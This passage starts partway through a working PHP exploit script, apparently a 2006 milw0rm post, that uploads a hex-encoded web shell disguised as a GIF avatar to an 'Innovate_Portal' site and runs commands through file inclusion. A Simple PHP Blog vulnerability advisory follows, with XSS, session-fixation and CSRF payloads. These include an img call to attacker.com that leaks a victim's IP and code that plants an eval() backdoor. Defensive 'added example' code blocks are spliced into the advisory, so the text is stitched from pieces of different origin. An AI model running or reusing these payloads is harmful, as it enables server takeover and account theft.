Usage: php '.$argv[0].' host path username password user_id cmd OPTIONS
host:      target server (ip/hostname)
path:      Innovate_Portal path
username:  a registered account (e.g. Hauru)
password:  its password (e.g. devilteam)
user_id:   the numeric user ID of that account (the id= value); the avatar is stored as <user_id>.gif
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Innovate_Portal/ Hauru devilteam 3 ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / Hauru devilteam 3 ls -la -p81
-----------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    if (!preg_match($proxy_regex,$proxy)) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  // every request is sent with "Connection: Close", so read until the peer closes the socket
  $html='';
  while (!feof($ock)) {
    $html.=fread($ock,8192);
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$password=$argv[4];
$user_id=$argv[5];
$cmd="";

$port=80;
$proxy="";
for ($i=6; $i<$argc; $i++){
$temp=substr($argv[$i],0,2);          // option prefix, safe for one-character arguments
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=(int)substr($argv[$i],2);
}
if ($temp=="-P")
{
  $proxy=substr($argv[$i],2);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";

$data='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="username"

'.$username.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="password"

'.$password.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"

Login
-----------------------------7d6224c08dc--
';


echo "login...\n";
$packet ="POST ".$p."login.php?page_id=3 HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// Text header " \r\nGIF86\r\n" (not a real GIF signature) followed by a PHP stub: ob_clean();
// a few echo banners; ini_set("max_execution_time",0); echo "Hauru"; passthru($_SERVER[HTTP_HAURU]); die;
// The command therefore travels in the HAURU request header. The upload code only looks at the
// client-supplied extension, and when getimagesize() fails on a non-image its size comparison is
// simply false, so the file is kept as images/avatars/<userid>.gif
$hauru=
"\x20\x0d\x0a\x47\x49\x46\x38\x36\x0d\x0a\x3c\x3f\x70\x68\x70\x20".
"\x6f\x62\x5f\x63\x6c\x65\x61\x6e\x28\x29\x3b\x0d\x0a\x2f\x2f\x52".
"\x75\x63\x68\x6f\x6d\x79\x20\x7a\x61\x6d\x65\x6b\x20\x48\x61\x75".
"\x72\x75\x20\x3b\x2d\x29\x0d\x0a\x65\x63\x68\x6f\x22\x2e\x2e\x2e".
"\x48\x61\x63\x6b\x65\x72\x2e\x2e\x4b\x61\x63\x70\x65\x72\x2e\x2e".
"\x4d\x61\x64\x65\x2e\x2e\x69\x6e\x2e\x2e\x50\x6f\x6c\x61\x6e\x64".
"\x21\x21\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x2e\x54\x45\x41\x4d\x2e".
"\x2e\x74\x68\x65\x2e\x2e\x62\x65\x73\x74\x2e\x2e\x70\x6f\x6c\x69".
"\x73\x68\x2e\x2e\x74\x65\x61\x6d\x2e\x2e\x47\x72\x65\x65\x74\x7a".
"\x2e\x2e\x2e\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65\x63\x68".
"\x6f\x22\x2e\x2e\x2e\x47\x6f\x20\x54\x6f\x20\x44\x45\x56\x49\x4c".
"\x20\x54\x45\x41\x4d\x20\x49\x52\x43\x3a\x20\x37\x32\x2e\x32\x30".
"\x2e\x31\x38\x2e\x36\x3a\x36\x36\x36\x37\x20\x23\x64\x65\x76\x69".
"\x6c\x74\x65\x61\x6d\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x65".
"\x63\x68\x6f\x22\x2e\x2e\x2e\x44\x45\x56\x49\x4c\x20\x54\x45\x41".
"\x4d\x20\x53\x49\x54\x45\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77".
"\x77\x77\x2e\x72\x61\x68\x69\x6d\x2e\x77\x65\x62\x64\x2e\x70\x6c".
"\x2f\x22\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x69\x6e\x69\x5f\x73".
"\x65\x74\x28\x22\x6d\x61\x78\x5f\x65\x78\x65\x63\x75\x74\x69\x6f".
"\x6e\x5f\x74\x69\x6d\x65\x22\x2c\x30\x29\x3b\x0d\x0a\x20\x0d\x0a".
"\x20\x0d\x0a\x65\x63\x68\x6f\x20\x22\x48\x61\x75\x72\x75\x22\x3b".
"\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x70\x61\x73\x73\x74\x68\x72\x75".
"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54\x54\x50\x5f\x48".
"\x41\x55\x52\x55\x5d\x29\x3b\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x64".
"\x69\x65\x3b\x3f\x3e\x0d\x0a\x20";


// fresh body: the login fields must not be replayed inside the avatar upload
$data='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="use_avatar"

1
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatar"; filename="hauru.gif"
Content-Type: text/plain

'.$hauru.'
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"

Einstellungen Speichern
-----------------------------7d6224c08dc--
';

echo "upload hauru...\n";
$packet ="POST ".$p."index.php?content=usercp&action=avatar HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

echo "Hauru uploaded!! now remote code execution...\n";
$packet ="GET ".$p."acp.php?content=../images/avatars/".$user_id.".gif%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";
?>

# milw0rm.com [2006-11-01]


DarkFig/sphpblog051-multi.txt ( na)

       Title:   Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
      Vendor:   http://sourceforge.net/projects/sphpblog/

    Advisory:   http://acid-root.new.fr/?0:15
      Author:   DarkFig < gmdarkfig (at) gmail (dot) com >

 Released on:   2007/10/21
   Changelog:   ----------
                                                     L   M   H   T
     Summary:   Ip Spoofing                         [X] [_] [_] [X]
                Cross Site Scripting                [X] [_] [_] [X]
                Session Fixation                    [X] [_] [_] [X]
                mail() CRLF Injection               [X] [_] [_] [_]
                Local File Inclusion (+CSRF)        [_] [X] [_] [X]
                File Deletion (+CSRF)               [_] [X] [_] [X]
                File Upload Vulnerability           [_] [_] [X] [X]
                Code Execution (+CSRF)              [_] [_] [X] [X]

      Legend:   L - Low risk         M - Medium risk
                H - High risk        T - Tested

  Risk level:   Medium / High
         CVE:   ----------



  I - IP SPOOFING

  The file "scripts/sb_communicate.php" contains the following
  code: 

  19| function getIP() {
  20|  if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
  21|       $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
  22|  }
  23|  else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
  24|      $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
  25|  }
  26|  else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
  27|     $ip = $_SERVER[ 'REMOTE_ADDR' ];
  28|  }
  29|  else if ( getenv( "HTTP_CLIENT_IP" ) ) {
  30|       $ip = getenv( "HTTP_CLIENT_IP" );
  31|  }
  32|  else if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) {
  33|     $ip = getenv( "HTTP_X_FORWARDED_FOR" );
  34|  }
  35|  else if ( getenv( "REMOTE_ADDR") ) {
  36|       $ip = getenv( "REMOTE_ADDR" );
  37|  }
  38|  else { 
  39|     $ip = "UNKNOWN";
  40|  }
  41|  return( $ip );
  42|  }

  So an attacker can spoof his IP: he just has to craft an
  HTTP request, add a special header, and send it. The
  HTTP packet will look like this:

  GET /index.php HTTP/1.1\r\n
  Host: localhost\r\n
  X-Forwarded-For: 127.0.0.1\r\n
  Connection: keep-alive\r\n\r\n

  Later, we'll see how to obtain the administrator's session
  id. Even with the right session id, there is a check that
  "normally" does not allow being logged in.
  Let's look at part of the file "scripts/sb_login.php":

  28| // Check if user is logged in.
  29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
    |             $_SESSION[ 'logged_in' ] == 'yes' ) {
    |
  30|   if ( $_SESSION[ 'site_path' ] ===
    |        dirname($_SERVER[ 'PHP_SELF' ]) ) {
    |
  31|     if ( $_SESSION[ 'ip' ] === getIP() ) {
  32|       // User is logged in.
  33|       return ( true );
  34|     }
  35|   }
  36| }

  Thanks to the getIP() function, if we know the
  administrator's IP (later we'll see how to get it easily),
  we can bypass the third condition.
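  The fix on the defender's side is to stop treating client-supplied headers as the client's address. The following getClientIP() is an added example, not code from sphpblog or this advisory; it assumes a hypothetical list of trusted reverse proxies (TRUSTED_PROXIES) and honours X-Forwarded-For only for requests that arrived through one of them, which also means the stored IP can never carry the markup used in section II.

```php
<?php
// Added example, not sphpblog code: derive the client IP from the socket
// peer (REMOTE_ADDR) and honour X-Forwarded-For only when the peer is one
// of our own reverse proxies. Every value returned is validated as an IP
// literal, so it can never carry "<script>" or be chosen by the client.

// Assumption: addresses of the reverse proxies in front of the blog, if any.
const TRUSTED_PROXIES = ['10.0.0.5'];

function getClientIP(array $server, array $trustedProxies = TRUSTED_PROXIES): string
{
    // REMOTE_ADDR comes from the TCP connection, not from a request header.
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return 'UNKNOWN';
    }

    // Any client can send X-Forwarded-For or Client-IP; those headers only
    // mean something when the request reached us through our own proxy.
    if (!in_array($peer, $trustedProxies, true)) {
        return $peer;
    }

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $peer;
    }

    // X-Forwarded-For is "client, proxy1, proxy2, ...": each proxy appends
    // the address it saw, so walk from the right and skip our own hops.
    $hops = array_map('trim', explode(',', $xff));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (in_array($hops[$i], $trustedProxies, true)) {
            continue;
        }
        // First hop we did not add ourselves: accept it only as an IP literal.
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) !== false) {
            return $hops[$i];
        }
        return $peer;
    }
    return $peer;
}

// Constructed requests mirroring the spoofing attempts in this advisory.
$direct = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => '127.0.0.1',                   // ignored: peer is not our proxy
    'HTTP_CLIENT_IP'       => '<script>alert(666)</script>', // never consulted at all
];
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.9, 10.0.0.5',      // real client behind our proxy
];
$proxyAbuse = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '<script>x</script>, 10.0.0.5', // invalid hop: fall back to peer
];

foreach (['direct' => $direct, 'viaProxy' => $viaProxy, 'proxyAbuse' => $proxyAbuse] as $label => $srv) {
    printf("%-10s -> %s\n", $label, getClientIP($srv));
}
```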



  II - CROSS SITE SCRIPTING

  When a guest adds a comment, an HTTP request is sent to
  "comment_add_cgi.php". Before the comment is written to
  a file, several conditions are checked; the first is
  that the IP sent with the POST method must be the same
  as the IP returned by the getIP() function. Let's look at
  the code:

  88| if ($ok) {
  89|   // Verify that posted IP and actual IP matches.
  90|   if ( getIP() === $_POST['user_ip'] ) {
  91|     $ipMatches = true;
  92|   } else {
  93|     $ipMatches = false;
  94|     $ok = false;
  95|     $error_message = $lang_string[ 'error_no_match' ];
  96|   }
  97| }

  This check is useless; I don't know what the author intended,
  but it can be bypassed easily. After a few more conditions,
  the write_comment() function is called:

  219| $result = write_comment( $_POST[ 'y' ], $_POST[ 'm' ],
     |          $_POST[ 'entry' ],
  220|     $comment_name,
  221|     $comment_email,
  222|     $comment_url,
  223|     $comment_text,
  224|     $_POST[ 'user_ip' ],
  225|     $moderationFlag,
  226|     time() );

  This function is located in "scripts/sb_comments.php".
  Let's look at the data that will be stored in a file:

  519| // Save the file
  520| $save_data = array();
  521| $save_data[ 'VERSION' ] = $sb_info[ 'version' ];
  522| $save_data[ 'NAME' ] = clean_post_text( $comment_name );
  523| $save_data[ 'DATE' ] = $comment_date;
  524| $save_data[ 'CONTENT' ] = sb_parse_url( clean_post_text( $comment_text ) );
     |
  525| if ( $comment_email != '' ) {
  526|   $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
  527| }
     |
  528| if ( $comment_url != '' ) {
  529|   $save_data[ 'URL' ] = clean_post_text( $comment_url );
  530| }
     |
  531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
  532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag;
  533| 
  534| // Implode the array
  535| $str = implode_with_keys( $save_data );
  536| 
  537| // Save the file
  538| $result = sb_write_file( $entryFile, $str ); 

  The clean_post_text() function protects against XSS; it
  also replaces the string separator (with its HTML equivalent)
  that is used when the comment's data are extracted.
  This function is in the file "scripts/sb_formatting.php":

  13| function clean_post_text( $str ) {
  14|   // Cleans post text input.
  15|   //
  16|   // Strip out and replace pipes with colons. HTML-ize entities.
  17|   // Use charset from the language file to make sure we're only
  18|   // encoding stuff that needs to be encoded.
  19|   //
  20|   // This makes entries safe for saving to a file (since the data
  21|   // format is pipe delimited.)
  22|   global $lang_string;
  23|   $str = str_replace( '|', '&#124;', $str );
  24|   $str = @htmlspecialchars( $str, ENT_QUOTES, $lang_string[ 'php_charset' ] );
  25| 
  26|   return ( $str );
  27| }

  The clean_post_text() function is not applied to the
  IP address that will be stored in the file, so this
  can be exploited to conduct an XSS attack. The attacker
  will send an HTTP packet like this one:

  POST /comment_add_cgi.php HTTP/1.1\r\n
  Host: localhost\r\n
  Client-IP: <script>alert(666)</script>\r\n
  Connection: keep-alive\r\n
  Content-Type: application/x-www-form-urlencoded\r\n
  Content-Length: 229\r\n\r\n
  y=07&m=07&entry=entry070727-161718&comment_name=HereMyName
  &comment_email=&comment_url=&user_ip=<script>alert(666)</script>
  &style_dropdown=--&comment_text=This+is+an+example+comment.
  &comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n

  The sender's IP address can only be seen by a registered
  user, so the code sent by the attacker will be executed
  when a registered user views the comments page.



  III - SESSION FIXATION

  In a session fixation attack, the attacker has to set
  the victim's session id. In our case, the attacker fixes
  the user's session id: the victim, who is logged in,
  will be logged out when the cookie is set; then, if the
  victim tries to log in again, that session id will be
  registered on the server. Let's look at part of the
  logged_in() function:

  11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
  12|         
  13|   // Turn off URL SIDs.
  14|   ini_set('url_rewriter.tags','');
  15|   ini_set('session.use_trans_sid', false);
  16| 
  17|   // Init the session.
  18|   session_set_cookie_params(60*60*24*5);
  19| 
  20|   // Check if the user has a client-side cookie.
  21|   if ( isset( $_COOKIE[ 'sid' ] ) ) {
  22|     session_id($_COOKIE[ 'sid' ]);
  23|   }
  24| 
  25|   // Start the session.
  26|   session_start ();
  27|     
  28| // Check if user is logged in.
  29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
    |             $_SESSION[ 'logged_in' ] == 'yes' ) {
    |
  30|   if ( $_SESSION[ 'site_path' ] ===
    |        dirname($_SERVER[ 'PHP_SELF' ]) ) {
    |
  31|     if ( $_SESSION[ 'ip' ] === getIP() ) {
  32|       // User is logged in.
  33|       return ( true );
  34|     }
  35|   }
  36| }

  Afterwards, the attacker, who knows the session id, just
  has to use it to be logged in to the victim's account.
  But in our case he must also know the victim's IP.
  I'll demonstrate how to get administrator rights even
  if the victim has protection against XSS (the NoScript
  Firefox plugin, for example). First, the attacker fixes
  the victim's session id by setting a cookie in the
  victim's browser. Then he also forces the victim's web
  browser to connect to a script that records the
  victim's IP. Take a look at this schema:

 +----------------------------------------------------------+
 | The attacker posts a comment via the XSS vulnerability.  |
 | The code executed in the victim's browser will set the   |
 | "sid" cookie; it will also force the victim's browser    |
 | to send an HTTP request to a script that mails the       |
 | victim's IP to the attacker.                             |
 +----------------------------------------------------------+
 |
 |    +---------------------------------------------------+
 +--> | <meta http-equiv=Set-Cookie content=sid=MD5HERE;> |
      | <img src=http://attacker.com/getip_and_mail.php>  |
      +---------------------------------------------------+
                                                          |
   +-------------------------------------------------+    |
   | The victim, who is logged in, has to view the   | <--+
   | comments page. After viewing it, the victim     |
   | will be logged out.                             |
   +-------------------------------------------------+
   |
   |    +------------------------------------------+
   +--> | The victim tries to log in. Once she's   |
        | logged in, the session id set by the     |
        | attacker is registered on the server.    |
        +------------------------------------------+
                                                   |
  +--------------------------------------------+   |
  | Now the attacker just has to send an HTTP  |<--+
  | request that contains the session id and a |
  | special header with the victim's IP.       |
  | The attacker is now logged in to the       |
  | victim's account.                          |
  +--------------------------------------------+

  As you can see, even if the victim is protected against
  XSS, it's still possible to get administrator rights with
  this type of attack; we just use the "meta" and "img" tags.



  IV - MAIL() CRLF INJECTION

  User variables are not checked before being used in the mail()
  function. The file "comment_add_cgi.php" calls the
  write_comment() function with the following parameters:

  214| $comment_name = sb_stripslashes($_POST['comment_name']);
  215| $comment_email = sb_stripslashes($_POST['comment_email']);
  216| $comment_url = sb_stripslashes($_POST['comment_url']);
  217| $comment_text = sb_stripslashes($_POST['comment_text']);
  218| 
  219| $result = write_comment($_POST[ 'y' ],$_POST[ 'm' ],
     |          $_POST['entry' ],
  220|     $comment_name,
  221|     $comment_email,
  222|     $comment_url,
  223|     $comment_text,
  224|     $_POST[ 'user_ip' ],
  225|     $moderationFlag,
  226|     time() );

  Then the clean_post_text() function is applied to $comment_email.
  But this function doesn't protect against CRLF injection: it
  does not replace the \r and \n characters. Take a look at the file
  "sb_comments.php":

  471| function write_comment($y,$m,$entry,$comment_name,$comment_email
     |
  525| if ( $comment_email != '' ) {
  526|      $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
  527| }
     |
  584| // Send the Email
  585| if ( array_key_exists( 'EMAIL', $save_data ) ) {
  586|   sb_mail( $save_data[ 'EMAIL' ], $blog_config[ 'blog_email' ],
     |            $subject, $body, false );
  587| } 

  The purpose of the sb_mail() function is to send mass emails.
  As you can see below, there is no protection applied to
  $save_data[ 'EMAIL' ].

   45|   function sb_mail ($from, $to, $subject, $body, $text=true, $priority=3) {
     |
   69|   $headers .= 'From: ' . $from . " \r\n";
   70|  $headers .= 'Reply-To: ' . $from . " \r\n";
   71|  $headers .= 'Return-Path: ' . $from . " \r\n";
     |
   76|  ini_set('sendmail_from', $from);
   77|  for ( $j=0; $j < count($to_array); $j++ ) {
   78|  $result = mail( $to_array[$j], sb_stripslashes($subject),
     |                  sb_stripslashes($body), $headers );
   79|  }
   80| ini_restore('sendmail_from');

  So an attacker can perform a CRLF injection attack through the
  mail() function; it will probably be used by spammers.
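  As an added example (not sphpblog code), here is how the From:/Reply-To:/Return-Path: headers that sb_mail() assembles could be guarded against the injection described above; safeSenderAddress() and buildMailHeaders() are names of my own choosing.

```php
<?php
// Added example, not sphpblog code: validate the commenter's address before
// it is ever placed into From:/Reply-To:/Return-Path:. FILTER_VALIDATE_EMAIL
// accepts no CR or LF, so it is simultaneously a format check and the CRLF
// guard that clean_post_text() does not provide.

function safeSenderAddress(string $candidate): ?string
{
    $candidate = trim($candidate);
    if ($candidate === '' || strlen($candidate) > 254) {
        return null;
    }
    // Belt and braces: refuse any control character explicitly, so a future
    // change to the filter's grammar cannot quietly reopen header injection.
    if (preg_match('/[\x00-\x1F\x7F]/', $candidate)) {
        return null;
    }
    $valid = filter_var($candidate, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

// Builds the header block, or null if the sender must be dropped. The caller
// should then send without a user-controlled From:, never fall back to the
// raw value.
function buildMailHeaders(string $from): ?string
{
    $from = safeSenderAddress($from);
    if ($from === null) {
        return null;
    }
    // One CRLF per header and no stray space before it (the original
    // appended " \r\n").
    return "From: $from\r\nReply-To: $from\r\nReturn-Path: $from\r\n";
}

// Constructed inputs: a normal address, and values shaped like the attack
// the advisory describes, where CR/LF smuggles extra headers into mail().
$inputs = [
    'reader@example.org',
    "reader@example.org\r\nBcc: someone@example.net",
    "reader@example.org\nBcc: someone@example.net",
];
foreach ($inputs as $in) {
    $headers = buildMailHeaders($in);
    printf("%-50s -> %s\n", addcslashes($in, "\0..\37"), $headers === null ? 'refused' : 'accepted');
}
```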



  V - LOCAL FILE INCLUSION (+CSRF)

  There is an LFI vulnerability (admin rights needed)
  in the file "languages_cgi.php":

  76|   if ( array_key_exists( 'store_data', $_GET ) ) {
  77|   
  78|   // Store all the data from language 2
  79|   require_once('languages/' . $_GET[ 'lang2' ] . '/strings.php');

  This requires magic_quotes_gpc=Off. Because the GET method
  is used, there's a CSRF vulnerability too. For each new
  comment, a new text file is created. The structure of the file
  is like this:

  VERSION|0.4.8
  |NAME|<my_name>
  |DATE|1188078694
  |CONTENT|<my_comment>
  |EMAIL|<my_email>
  |IP-ADDRESS|<my_ip_or_xss>
  |MODERATIONFLAG|H

  Now imagine that an attacker uses the XSS vulnerability to post
  PHP code and HTML tags that will make the admin send an HTTP
  request exploiting the LFI vuln. The XSS code will look like
  this:

  <!--- <?php
  $handle = fopen('./themes/back.php', 'w+');
  fwrite($handle, '<?php @eval($_SERVER[HTTP_SHELL]); ?>');
  fclose($handle);
  mail('hacker@you.com', 'hey', 'code executed');
  exit();
  /* --->
  <img src=http://<site>/languages_cgi.php?store_data=1&lang2=
  ../content/07/07/entry070727-161718/comments/comment070825-235134.txt%00>
  <!--- */
  ?> --->

  In order to exploit this, the attacker must know where the new
  file will be created. Let's see the code:

  471|   function write_comment ( $y, $m, $entry, $comment_name,
     |   $comment_email, $comment_url, $comment_text, $user_ip,
     |   $hold_flag='', $comment_date=null ) {
     | 
  478|     $basedir = 'content/';
  479|     $dir = $basedir.$y.'/'.$m.'/'.$entry;
     | 
  494|     $dir .= '/comments';
     | 
  506|     $dir  .= '/';
     |
  512|     $stamp = date('ymd-His');
  513|     if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
  514|       $entryFile = $dir.'comment'.$stamp.'.txt.gz';
  515|     } else {
  516|       $entryFile = $dir.'comment'.$stamp.'.txt';
  517|     }

  The variables $y, $m and $entry are sent with the HTTP request.
  The filename is determined by the date() function. There are
  several ways to learn the value of $stamp:
  - Ask the server by sending an HTTP request (the "Date" header).
  - Bruteforce the path (Add several html tags).
  - Divide our attack in two parts (filenames are displayed in the html source).

  The attacker must also urlencode the content of his XSS; the
  HTTP packet will finally look like this:

  POST /comment_add_cgi.php HTTP/1.1
  Host: localhost
  Connection: keep-alive
  Cookie: PHPSESSID=<SID>
  Client-IP: <HTML_AND_PHP_CONTENT>
  Content-Type: application/x-www-form-urlencoded
  Content-Length: <LEN>
  y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker
  &comment_email=my%40you.com&comment_url=&user_ip=
  <HTML_AND_PHP_CONTENT_URLENCODED>
  &style_dropdown=--&comment_text=Hello&comment_capcha
  =128619&submit=%A0Post+Comment%A0

  Now the attacker has to wait until the admin sees his comment.
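  On the defender's side, the include in languages_cgi.php needs a containment check on $_GET['lang2']. The following resolveLanguageFile() is an added example rather than sphpblog code; it also refuses the NUL-byte truncation and traversal used by the other exploits on this page, and builds a throwaway fixture under the system temp directory so it can be run as-is.

```php
<?php
// Added example, not sphpblog code: resolve the language file inside a fixed
// base directory and refuse anything that escapes it. This is the check that
// languages_cgi.php lacks for $_GET['lang2']; the same containment test also
// stops the "../images/avatars/<id>.gif%00" style of include seen elsewhere
// on this page.

function resolveLanguageFile(string $baseDir, string $lang): ?string
{
    // A NUL byte truncates the path inside the C-level file functions, which
    // is what the "%00" suffix relies on. Refuse it instead of trusting
    // magic_quotes or the PHP version to strip it.
    if (strpos($lang, "\0") !== false) {
        return null;
    }
    // A language name is a short identifier; "../" is never part of one.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $lang)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $target = realpath($base . '/' . $lang . '/strings.php');
    if ($target === false) {
        return null; // no such language: nothing to include
    }
    // Containment on the canonical path: "..", "./" and symlinks are resolved
    // by realpath(), so a prefix test against $base is meaningful here.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed fixture: a temporary languages tree with one real language
// and a sensitive file one level above it.
$root = sys_get_temp_dir() . '/lang_demo_' . bin2hex(random_bytes(4));
mkdir("$root/languages/en", 0700, true);
file_put_contents("$root/languages/en/strings.php", "<?php \$lang_string = ['hello' => 'Hello'];\n");
file_put_contents("$root/secret.txt", "not a language file\n");

$base = "$root/languages";
$attempts = [
    'en'                  => true,  // legitimate language
    '../secret.txt'       => false, // plain traversal
    "../secret.txt\0"     => false, // traversal plus NUL truncation
    'en/../../secret.txt' => false, // traversal hidden behind a real name
];
foreach ($attempts as $input => $expectedToResolve) {
    $resolved = resolveLanguageFile($base, $input) !== null;
    printf("%-24s -> %s\n", addcslashes($input, "\0..\37"), $resolved ? 'included' : 'refused');
    if ($resolved !== $expectedToResolve) {
        throw new RuntimeException('containment check did not behave as expected');
    }
}

$file = resolveLanguageFile($base, 'en');
if ($file !== null) {
    require_once $file; // safe: canonical path, proven to lie inside $base
}

// Clean up the fixture.
unlink("$root/languages/en/strings.php");
unlink("$root/secret.txt");
rmdir("$root/languages/en");
rmdir("$root/languages");
rmdir($root);
```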



  VI - FILE DELETION (+CSRF)

  There is a CSRF vulnerability which can lead to file
  deletion. Let's see the code of "trackback_delete_cgi.php":

  22| if ( array_key_exists( 'trackback', $_GET ) ) {
  23|   $ok = delete_trackback( $_GET[ 'trackback' ] );  
  24| }

  So if the variable "trackback" is set with the GET method, 
  the delete_trackback() function is called. The code of 
  this function is situated in "sb_trackback.php":

  229|   function delete_trackback ( $entryFile ) {
  230|     // Delete the old file
  231|     if ( file_exists( $entryFile ) ) {
  232|       $ok = sb_delete_file( $entryFile );
  233|     }

  If the file exists, the function sb_delete_file() is called,
  with the parameter $_GET['trackback']. The source code 
  of this function is situated in the file "sb_fileio.php":

  171|   function sb_delete_file ( $filename ) {
     |
  175|     clearstatcache();
  176|     if ( file_exists( $filename ) ) {
  177|       $result = @unlink( $filename );
  178|     }

  There is no verification before deleting the file, so we
  can delete any file on the server. The HTTP packet sent
  by the attacker will look like this:

  GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
  Host: localhost\r\n
  Connection: keep-alive\r\n\r\n

  Admin rights are needed to delete files, but because
  it's also a CSRF vulnerability, we can use it in our XSS,
  so admin rights aren't needed for the attacker.



  VII - FILE UPLOAD VULNERABILITY

  When we're admin, we can upload emoticons.
  Let's see the content of the function upload_emoticons(),
  which is located in the file "emoticons.php":

  36| function upload_emoticons() {
  37|   // Emoticon upload form results
  38|   $path = 'images/emoticons';
  39|   $uploaddir = $path;
  40|   
  41|   $ok = false;
  42|   if ( $_FILES[ 'user_emot' ][ 'error' ] == 0 ) {
  43|   if (!file_exists($uploaddir)) {
  44|     $oldumask = umask(0);
  45|     @mkdir($uploaddir, 0777 );
  46|     @umask($oldumask);
  47|   }
  48|     
  49|   $uploaddir .= '/';
  50|   $uploadfile = $uploaddir.
    |                 preg_replace("/ /","_",$_FILES[ 'user_emot' ][ 'name' ]);
  51| 
  52|   if (@is_uploaded_file($_FILES['user_emot']['tmp_name'])) {
    |
  53|   if (@getimagesize($_FILES['user_emot']['tmp_name']) == FALSE){
  54|     $ok = -1;
    |
  55|   } else {
    |
